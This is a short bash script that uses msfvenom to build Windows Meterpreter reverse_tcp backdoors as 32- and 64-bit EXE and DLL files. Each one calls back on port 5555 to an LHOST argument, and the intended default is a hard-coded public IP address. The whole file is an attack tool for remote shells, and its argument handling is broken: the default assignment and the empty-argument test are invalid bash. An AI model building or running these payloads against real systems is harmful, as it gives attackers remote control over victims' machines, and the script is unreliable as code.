#!/usr/bin/env bash
# ******************************************************
# Author       : kaleo
# Last modified: 2017-05-22 09:24
# Email        : kaleo1990@hotmail.com
# Filename     : createpayload
# Description  : 
# ******************************************************
if [[ $1.'x' == 'x' ]]; then
    $1=120.24.159.2
fi
echo $1;
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$1 LPORT=5555 -f exe > cmd_32.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$1 LPORT=5555 -f dll > cmd_32.dll
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=$1 LPORT=5555 -f exe > cmd_64.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=$1 LPORT=5555 -f dll > cmd_64.dll
